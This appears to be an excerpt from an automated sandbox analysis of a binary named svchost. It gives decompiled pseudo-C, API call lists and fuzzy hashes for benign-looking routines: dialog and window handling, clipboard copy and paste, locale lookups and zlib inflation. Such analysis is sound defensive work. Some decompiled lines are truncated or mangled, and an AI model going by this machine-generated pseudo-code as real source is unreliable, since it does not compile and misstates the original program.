    0x004843ce
    0x004843ce
    0x004843d5
    0x004843e6
    0x004843e9
    0x004843f0
    0x004843f3
    0x004843f6
    0x004843fb
    0x00484401
    0x00484403
    0x00484409
    0x0048440f
    0x0048440f
    0x00484403
    0x00484416
    0x00484417
    0x0048441a
    0x0048442e
    0x00484433
    0x00484435
    0x00484437
    0x0048443b
    0x00484441
    0x00484442
    0x00484447
    0x0048444a
    0x0048444e
    0x0048444e
    0x0048444f
    0x00484452
    0x00484452
    0x00484457
    0x0048445a
    0x00484468
    0x00484468
    0x0048445a
    0x00484489
    0x0048448d
    0x00484490
    0x00484497
    0x00484497
    0x0048449d
    0x004844a0
    0x004844a8
    0x004844ab
    0x004844b0
    0x004844b0
    0x004844ab
    0x004844ba
    0x004844bf
    0x004844c4
    0x004843d7
    0x004843d7
    0x004843d7
    0x004844cc
    0x004844d5

    APIs
    • __EH_prolog.LIBCMT ref: 0048437B
    • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004843B3
    • LoadResource.KERNEL32(?,00000000,?,?,?,00000000), ref: 004843BB
      • Part of subcall function 0048519E: UnhookWindowsHookEx.USER32(?), ref: 004851C3
    • LockResource.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 004843C8
    • IsWindowEnabled.USER32(?), ref: 004843FB
    • EnableWindow.USER32(?,00000000), ref: 00484409
    • EnableWindow.USER32(?,00000001), ref: 00484497
    • GetActiveWindow.USER32 ref: 004844A2
    • SetActiveWindow.USER32(?,?,?,00000000,?,?,?,00000000), ref: 004844B0
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
    • String ID:
    • API String ID: 401145483-0
    • Opcode ID: d66c5ac76da529ffea1a0be7e6add78610ed2b49e08e879faf088dc1803e0abc
    • Instruction ID: dd0ef95a1e9da3bc0a7dea387f597797d51191665c4855fc232cff2d401fa857
    • Opcode Fuzzy Hash: d66c5ac76da529ffea1a0be7e6add78610ed2b49e08e879faf088dc1803e0abc
    • Instruction Fuzzy Hash: 0D41B430A006169FCF21BF65CD49B7FBBB5AF84B15F104A2FE501A2291CB795D00DB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00432F60 Relevance: 12.1, APIs: 8, Instructions: 88clipboardmemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E00432F60(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HWND__* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _v28;
				char _v32;
				char _v36;
				void* __ebp;
				void* _t18;
				long _t24;
				void* _t25;
				signed int _t32;
				int _t33;
				void* _t39;
				signed int _t48;
				signed int _t49;
				void* _t70;
				void* _t71;
				signed int _t73;
				intOrPtr _t74;
				void* _t75;

				_push(0xffffffff);
				_push(E0048FB48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t74;
				_t75 = _t74 - 0x14;
				_push(_t71);
				_t18 = E0042D860(__ecx);
				_t78 = _t18;
				if(_t18 == 0) {
					L8:
					 *[fs:0x0] = _v12;
					return _t18;
				} else {
					E0040B5D0( &_v32);
					_push(_a16);
					_v4 = 0;
					if(E0042AF70(E0042D860(__ecx), _t71, _t78,  &_v32, _a4, _a8, _a12) != 0) {
						_t24 = _v20;
						_t73 = _t24;
						if(_t24 != 0) {
							_t25 = GlobalAlloc(0x42, _t24);
							_t39 = _t25;
							if(_t39 != 0) {
								asm("sbb esi, esi");
								_t70 =  ~_v20 & _v28;
								GlobalFix(_t39);
								_t48 = _t73;
								_t49 = _t48 >> 2;
								memcpy(_t25, _t70, _t49 << 2);
								memcpy(_t70 + _t49 + _t49, _t70, _t48 & 0x00000003);
								_t75 = _t75 + 0x18;
								E0040B7D0( &_v36);
								GlobalUnWire(_t39);
								if(OpenClipboard(0) != 0) {
									EmptyClipboard();
									_t32 =  *0x4c9de0; // 0xc1e0
									_t33 = _t32 & 0x0000ffff;
									__eflags = _t33;
									SetClipboardData(_t33, _t39);
									CloseClipboard();
								} else {
									GlobalFree(_t39);
								}
							}
						}
					}
					_v8 = 0xffffffff;
					_v36 = 0x496e20;
					_t18 = E0040B7D0( &_v36);
					goto L8;
				}
			}
























    0x00432f66
    0x00432f68
    0x00432f6d
    0x00432f6e
    0x00432f75
    0x00432f79
    0x00432f7d
    0x00432f82
    0x00432f84
    0x00433068
    0x0043306f
    0x00433079
    0x00432f8a
    0x00432f8e
    0x00432f9f
    0x00432fae
    0x00432fc4
    0x00432fca
    0x00432fd0
    0x00432fd2
    0x00432fd7
    0x00432fdd
    0x00432fe1
    0x00432fef
    0x00432ff1
    0x00432ff3
    0x00432ff9
    0x00432fff
    0x00433002
    0x00433009
    0x00433009
    0x0043300f
    0x00433015
    0x00433026
    0x00433031
    0x00433037
    0x0043303d
    0x0043303d
    0x00433043
    0x00433049
    0x00433028
    0x00433029
    0x00433029
    0x00433026
    0x00432fe1
    0x00432fd2
    0x00433053
    0x0043305b
    0x00433063
    0x00000000
    0x00433063

    APIs
    • GlobalAlloc.KERNEL32(00000042,?), ref: 00432FD7
    • GlobalFix.KERNEL32(00000000), ref: 00432FF3
    • GlobalUnWire.KERNEL32(00000000), ref: 00433015
    • OpenClipboard.USER32(00000000), ref: 0043301D
    • GlobalFree.KERNEL32(00000000), ref: 00433029
    • EmptyClipboard.USER32 ref: 00433031
    • SetClipboardData.USER32(0000C1E0,00000000), ref: 00433043
    • CloseClipboard.USER32 ref: 00433049
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWire
    • String ID:
    • API String ID: 3835215632-0
    • Opcode ID: bae163786040f720fb4e92fd324b7ea6c7f2db4e40cace48cd8024b9c33a86eb
    • Instruction ID: 1a8c52708e0c2479fc18366f5a0785fc10e7992fe0e211884d4772ef256bea1a
    • Opcode Fuzzy Hash: bae163786040f720fb4e92fd324b7ea6c7f2db4e40cace48cd8024b9c33a86eb
    • Instruction Fuzzy Hash: 5031BF71204201AFC718EF65DD95A2BB7A8EB98721F104A3EF85293281DB78D904CB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004330C0 Relevance: 10.6, APIs: 7, Instructions: 89clipboardCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E004330C0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebp;
				signed int _t16;
				long _t20;
				void* _t31;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t50;

				_t48 = __ecx;
				_t14 = E0042D860(__ecx);
				if(_t14 == 0) {
					L10:
					return _t14;
				} else {
					_t14 = E0042AE20(E0042D860(__ecx));
					if(_t14 != 0) {
						goto L10;
					} else {
						_t14 = OpenClipboard(_t14);
						if(_t14 == 0) {
							goto L10;
						} else {
							_t16 =  *0x4c9de0; // 0xc1e0
							_t49 = GetClipboardData(_t16 & 0x0000ffff);
							if(_t49 != 0) {
								_t50 = _a8;
								_push(1);
								_push( &_v12);
								_push( &_v8);
								_push( &_v4);
								_t20 = GlobalSize(_t49);
								GlobalFix(_t49);
								_t31 = E0042B050(E0042D860(_t48), _t50, _t20, _t20, _a4, _t50,  *(_t48 + 0x44) >> 0x00000004 & 0x00000001);
								GlobalUnWire(_t49);
								CloseClipboard();
								_t14 = 1;
								if(_v24 == 1 && _t31 == 1) {
									if(_v28 == 1) {
										 *((intOrPtr*)( *_t48 + 0xcc))();
									}
									return  *((intOrPtr*)( *_t48 + 0xc0))(_v12, _t50, _v20, _v24);
								}
								goto L10;
							} else {
								return CloseClipboard();
							}
						}
					}
				}
			}
















    0x004330c7
    0x004330c9
    0x004330d0
    0x004331b6
    0x004331b6
    0x004330d6
    0x004330df
    0x004330e6
    0x00000000
    0x004330ec
    0x004330ed
    0x004330f5
    0x00000000
    0x004330fb
    0x004330fb
    0x0043310c
    0x00433110
    0x00433126
    0x0043312a
    0x0043312c
    0x0043313b
    0x00433143
    0x00433148
    0x00433150
    0x00433166
    0x00433168
    0x0043316e
    0x00433178
    0x0043317f
    0x00433189
    0x0043318f
    0x0043318f
    0x00000000
    0x004331a9
    0x00000000
    0x00433112
    0x0043311f
    0x0043311f
    0x00433110
    0x004330f5
    0x004330e6

    APIs
    • OpenClipboard.USER32(00000000), ref: 004330ED
    • GetClipboardData.USER32(0000C1E0), ref: 00433106
    • CloseClipboard.USER32 ref: 00433112
    • GlobalSize.KERNEL32(00000000), ref: 00433148
    • GlobalFix.KERNEL32(00000000), ref: 00433150
    • GlobalUnWire.KERNEL32(00000000), ref: 00433168
    • CloseClipboard.USER32 ref: 0043316E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Clipboard$Global$Close$DataOpenSizeWire
    • String ID:
    • API String ID: 1435569668-0
    • Opcode ID: 101abafd1394978a8073d736d75ca4bbbf8514313104214a0dcd7160ba9c0b7b
    • Instruction ID: 8683634fd5cbad426c66645dc44af58df815bc4f342852bad38c7aa0a7d2edd8
    • Opcode Fuzzy Hash: 101abafd1394978a8073d736d75ca4bbbf8514313104214a0dcd7160ba9c0b7b
    • Instruction Fuzzy Hash: BB219631700201ABDA14EB65EC54E7F7799EF98356F04063EF905D3240EB68DD05C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047ED6E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 87COMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E0047ED6E(void* __edx, int _a4, int _a8, char* _a12, int _a16) {
				signed int _t22;
				intOrPtr _t24;
				void* _t27;
				int _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;
				void* _t50;
				void* _t51;
				char* _t52;

				_t49 = __edx;
				_t51 = 0;
				_t50 = 0x1a;
				while(1) {
					_t34 = _a16;
					asm("cdq");
					_t22 = _t50 + _t51 - _t49 >> 1;
					_t37 =  *((intOrPtr*)(0x4bc3c0 + _t22 * 0x2c));
					if(_a4 == _t37) {
						break;
					}
					if(_a4 >= _t37) {
						_t51 = _t22 + 1;
					} else {
						_t50 = _t22 - 1;
					}
					if(_t51 <= _t50) {
						continue;
					} else {
						L6:
						return GetLocaleInfoA(_a4, _a8, _a12, _t34);
					}
				}
				_t39 = _a8 - 1;
				if(_t39 == 0) {
					_t24 = 0x4bc3c4 + _t22 * 0x2c;
					L22:
					if(_t24 == 0 || _t34 < 1) {
						goto L6;
					} else {
						_t52 = _a12;
						E004714B0(_t52, _t24, _t34 - 1);
						_t52[_t34 - 1] = _t52[_t34 - 1] & 0x00000000;
						_t27 = 1;
						return _t27;
					}
				}
				_t42 = _t39;
				if(_t42 == 0) {
					_t24 = 0x4bc3d0 + _t22 * 0x2c;
					goto L22;
				}
				_t43 = _t42 - 4;
				if(_t43 == 0) {
					_t24 = 0x4bc3d8 + _t22 * 0x2c;
					goto L22;
				}
				_t44 = _t43 - 4;
				if(_t44 == 0) {
					_t24 = 0x4bc3dc + _t22 * 0x2c;
					goto L22;
				}
				_t45 = _t44 - 0xff6;
				if(_t45 == 0) {
					_t24 =  *((intOrPtr*)(0x4bc3cc + _t22 * 0x2c));
					goto L22;
				}
				_t46 = _t45 - 1;
				if(_t46 == 0) {
					_t24 =  *((intOrPtr*)(0x4bc3d4 + _t22 * 0x2c));
					goto L22;
				}
				if(_t46 != 0) {
					goto L6;
				}
				_t24 = 0x4bc3e4 + _t22 * 0x2c;
				goto L22;
			}


















    0x0047ed6e
    0x0047ed76
    0x0047ed78
    0x0047ed79
    0x0047ed7c
    0x0047ed7f
    0x0047ed82
    0x0047ed89
    0x0047ed92
    0x00000000
    0x00000000
    0x0047ed97
    0x0047ed9e
    0x0047ed99
    0x0047ed99
    0x0047ed99
    0x0047eda3
    0x00000000
    0x0047eda5
    0x0047eda5
    0x00000000
    0x0047edaf
    0x0047eda3
    0x0047edbf
    0x0047edc0
    0x0047ee20
    0x0047ee25
    0x0047ee27
    0x00000000
    0x0047ee36
    0x0047ee36
    0x0047ee3f
    0x0047ee47
    0x0047ee4e
    0x00000000
    0x0047ee4e
    0x0047ee27
    0x0047edc3
    0x0047edc4
    0x0047ee16
    0x00000000
    0x0047ee16
    0x0047edc6
    0x0047edc9
    0x0047ee0c
    0x00000000
    0x0047ee0c
    0x0047edcb
    0x0047edce
    0x0047ee02
    0x00000000
    0x0047ee02
    0x0047edd0
    0x0047edd6
    0x0047edf7
    0x00000000
    0x0047edf7
    0x0047edd8
    0x0047edd9
    0x0047edec
    0x00000000
    0x0047edec
    0x0047eddd
    0x00000000
    0x00000000
    0x0047ede2
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 0047EDAF
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID: 040a$1252$850$ESP$ESP
    • API String ID: 2299586839-1770330732
    • Opcode ID: 8ef497ba0311ae26d5c0931663908c646477a3aa802c0e199617975973725515
    • Instruction ID: eee7c04450d545d353a19342748c242166018a676046d824cbd5eca3d9b963af
    • Opcode Fuzzy Hash: 8ef497ba0311ae26d5c0931663908c646477a3aa802c0e199617975973725515
    • Instruction Fuzzy Hash: 3D216E32100503ABC7384E3ADEC99FB77D9D74C300744D6BBE809CA191D639EE45925E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047E607 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E0047E607(void* __ecx, void* __edx, intOrPtr* _a4, short* _a8, intOrPtr _a12) {
				short* _t14;
				void* _t15;
				intOrPtr* _t20;
				void* _t29;
				short _t31;
				short _t32;
				intOrPtr* _t33;
				void* _t34;
				signed short _t35;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t52;

				_t34 = __edx;
				_t29 = __ecx;
				_t42 =  *0x4e1b34; // 0x0
				if(_t42 == 0) {
					if(E0047ED38() == 0) {
						 *0x4e1b34 = E0047ED6E;
					} else {
						 *0x4e1b34 =  *0x49218c;
					}
				}
				_t36 = _a4;
				if(_t36 == 0) {
					L19:
					E0047EC37();
				} else {
					 *0x4e1b24 = _t36;
					if( *_t36 != 0) {
						E0047E784(_t29, _t34, "|\xef\xbf\xbdI", 0x40, 0x						_t40 = _t40 + 0xc;
					}
					_t20 = _t36 + 0x40;
					 *0x4e1b28 = _t20;
					if(_t20 != 0 &&  *_t20 != 0) {
						E0047E784(_t29, _t34, "l\xef\xbf\xbdI", 0x16, 0x						_t20 =  *0x4e1b28; // 0x0
						_t40 = _t40 + 0xc;
					}
					_t33 =  *0x4e1b24; // 0x0
					 *0x4e1b2c = 0;
					if(_t33 == 0 ||  *_t33 == 0) {
						__eflags = _t20;
						if(_t20 == 0) {
							goto L19;
						}
						__eflags =  *_t20;
						if(__eflags == 0) {
							goto L19;
						}
						E0047EB7A(__eflags);
					} else {
						if(_t20 == 0) {
							L15:
							E0047EA67(__eflags);
							L20:
							_t52 =  *0x4e1b2c; // 0x0
							if(_t52 == 0) {
								L31:
								__eflags = 0;
								return 0;
							}
							_t35 = E0047EC51(_t36 + 0x80);
							if(_t35 == 0 || IsValidCodePage(_t35 & 0x0000ffff) == 0 || IsValidLocale( *0x4e1b14, 1) == 0) {
								goto L31;
							} else {
								_t14 = _a8;
								if(_t14 != 0) {
									_t31 =  *0x4e1b14; // 0x0
									 *_t14 = _t31;
									_t32 =  *0x4e1b30; // 0x0
									 *((short*)(_t14 + 2)) = _t32;
									 *(_t14 + 4) = _t35;
								}
								_t38 = _a12;
								if(_t38 == 0) {
									L30:
									_t15 = 1;
									return _t15;
								} else {
									_push(0x40);
									_push(_t38);
									_push(0x1001);
									_push( *0x4e1b14);
									if( *0x4e1b34() == 0) {
										goto L31;
									}
									_push(0x40);
									_push(_t38 + 0x40);
									_push(0x1002);
									_push( *0x4e1b30);
									if( *0x4e1b34() == 0) {
										goto L31;
									}
									E004711D5(_t35, _t38 + 0x80, 0xa);
									goto L30;
								}
							}
						}
						_t51 =  *_t20;
						if( *_t20 == 0) {
							goto L15;
						}
						E0047E7DC(_t51);
					}
				}
			}

















    0x0047e607
    0x0047e607
    0x0047e60a
    0x0047e612
    0x0047e61b
    0x0047e629
    0x0047e61d
    0x0047e622
    0x0047e622
    0x0047e61b
    0x0047e633
    0x0047e639
    0x0047e6bf
    0x0047e6bf
    0x0047e63f
    0x0047e63f
    0x0047e647
    0x0047e655
    0x0047e65a
    0x0047e65a
    0x0047e65d
    0x0047e662
    0x0047e667
    0x0047e679
    0x0047e67e
    0x0047e683
    0x0047e683
    0x0047e686
    0x0047e68c
    0x0047e694
    0x0047e6b0
    0x0047e6b2
    0x00000000
    0x00000000
    0x0047e6b4
    0x0047e6b6
    0x00000000
    0x00000000
    0x0047e6b8
    0x0047e69a
    0x0047e69c
    0x0047e6a9
    0x0047e6a9
    0x0047e6c4
    0x0047e6c4
    0x0047e6ca
    0x0047e77e
    0x0047e77e
    0x00000000
    0x0047e77e
    0x0047e6dc
    0x0047e6e1
    0x00000000
    0x0047e70b
    0x0047e70b
    0x0047e711
    0x0047e713
    0x0047e71a
    0x0047e71d
    0x0047e724
    0x0047e728
    0x0047e728
    0x0047e72c
    0x0047e732
    0x0047e779
    0x0047e77b
    0x00000000
    0x0047e734
    0x0047e734
    0x0047e736
    0x0047e737
    0x0047e73c
    0x0047e74a
    0x00000000
    0x00000000
    0x0047e74f
    0x0047e751
    0x0047e752
    0x0047e757
    0x0047e765
    0x00000000
    0x00000000
    0x0047e771
    0x00000000
    0x0047e776
    0x0047e732
    0x0047e6e1
    0x0047e69e
    0x0047e6a0
    0x00000000
    0x00000000
    0x0047e6a2
    0x0047e6a2
    0x0047e694

    APIs
    • IsValidCodePage.KERNEL32(00000000,004BC0C8,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047E6EB
    • IsValidLocale.KERNEL32(00000001), ref: 0047E701
      • Part of subcall function 0047ED38: GetVersionExA.KERNEL32(?), ref: 0047ED52
      • Part of subcall function 0047EB7A: EnumSystemLocalesA.KERNEL32(0047EBB1,00000001,004BC0C8,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047EB9A
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Valid$CodeEnumLocaleLocalesPageSystemVersion
    • String ID: lI$|I
    • API String ID: 2902790910-1115132947
    • Opcode ID: c2214b4c1f9f3aa1cf7812849f689a4e30d61fa8f269100a687a81150b888806
    • Instruction ID: 9b2459b3c6860c4913e0f44a1b10b4bc78b618502993a035c3e067bd90e5eaa3
    • Opcode Fuzzy Hash: c2214b4c1f9f3aa1cf7812849f689a4e30d61fa8f269100a687a81150b888806
    • Instruction Fuzzy Hash: C631F8716802819ED7309F639CC1AE637949B2D740B5482BFE54C9E2F1E678A844CB6E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0044A170 Relevance: 6.6, Strings: 5, Instructions: 373COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 98%
    			E0044A170(intOrPtr* _a4, signed int _a8) {
				signed int* _t129;
				signed int _t177;
				signed int _t180;
				signed int _t231;
				intOrPtr* _t235;
				signed int _t236;

				_t235 = _a4;
				if(_t235 == 0 ||  *(_t235 + 0x1c) == 0 ||  *_t235 == 0) {
					L48:
					return 0xfffffffe;
				} else {
					_t231 = 0xfffffffb;
					_t236 = 5;
					_t177 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
					_a8 = _t177;
					while(1) {
						L4:
						_t129 =  *(_t235 + 0x1c);
						_t180 =  *_t129;
						if(_t180 > 0xd) {
							goto L48;
						}
						switch( *((intOrPtr*)(_t180 * 4 +  &M0044A568))) {
							case 0:
								_t181 =  *((intOrPtr*)(_t235 + 4));
								if(_t181 == 0) {
									goto L36;
								} else {
									 *((intOrPtr*)(_t235 + 4)) = _t181 - 1;
									_t231 = _t177;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t129[1] = 0;
									_t131 =  *(_t235 + 0x1c);
									 *_t235 =  *_t235 + 1;
									if((_t131[1] & 0x0000000f) == 8) {
										if((_t131[1] >> 4) + 8 <= _t131[4]) {
											 *_t131 = 1;
											goto L12;
										} else {
											 *_t131 = 0xd;
											 *(_t235 + 0x18) = "invalid window size";
											( *(_t235 + 0x1c))[1] = _t236;
											goto L4;
										}
									} else {
										 *_t131 = 0xd;
										 *(_t235 + 0x18) = "unknown compression method";
										( *(_t235 + 0x1c))[1] = _t236;
										goto L4;
									}
								}
								goto L52;
							case 1:
								L12:
								_t132 =  *((intOrPtr*)(_t235 + 4));
								if(_t132 == 0) {
									goto L36;
								} else {
									 *((intOrPtr*)(_t235 + 4)) = _t132 - 1;
									_t231 = _t177;
									_t178 =  *(_t235 + 0x1c);
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t136 =  *_t235;
									_t192 =  *_t136;
									 *_t235 = _t136 + 1;
									if((_t178[1] << 8) % 0x1f == 0) {
										if((_t192 & 0x00000020) != 0) {
											_t179 = _a8;
											 *( *(_t235 + 0x1c)) = 2;
											goto L35;
										} else {
											 *_t178 = 7;
											_t177 = _a8;
											_t236 = 5;
											goto L4;
										}
									} else {
										 *_t178 = 0xd;
										_t177 = _a8;
										_t236 = 5;
										 *(_t235 + 0x18) = "incorrect header check";
										( *(_t235 + 0x1c))[1] = 5;
										goto L4;
									}
								}
								goto L52;
							case 2:
								L35:
								_t143 =  *((intOrPtr*)(_t235 + 4));
								if(_t143 != 0) {
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									 *((intOrPtr*)(_t235 + 4)) = _t143 - 1;
									_t232 = _t179;
									( *(_t235 + 0x1c))[2] = 0 << 0x18;
									 *_t235 =  *_t235 + 1;
									 *( *(_t235 + 0x1c)) = 3;
									goto L38;
								} else {
									goto L36;
								}
								goto L52;
							case 3:
								L38:
								_t148 =  *((intOrPtr*)(_t235 + 4));
								if(_t148 != 0) {
									 *((intOrPtr*)(_t235 + 4)) = _t148 - 1;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t233 = _t179;
									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 0x10);
									 *_t235 =  *_t235 + 1;
									 *( *(_t235 + 0x1c)) = 4;
									goto L41;
								} else {
									return _t232;
								}
								goto L52;
							case 4:
								L41:
								_t155 =  *((intOrPtr*)(_t235 + 4));
								if(_t155 != 0) {
									 *((intOrPtr*)(_t235 + 4)) = _t155 - 1;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t234 = _t179;
									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 8);
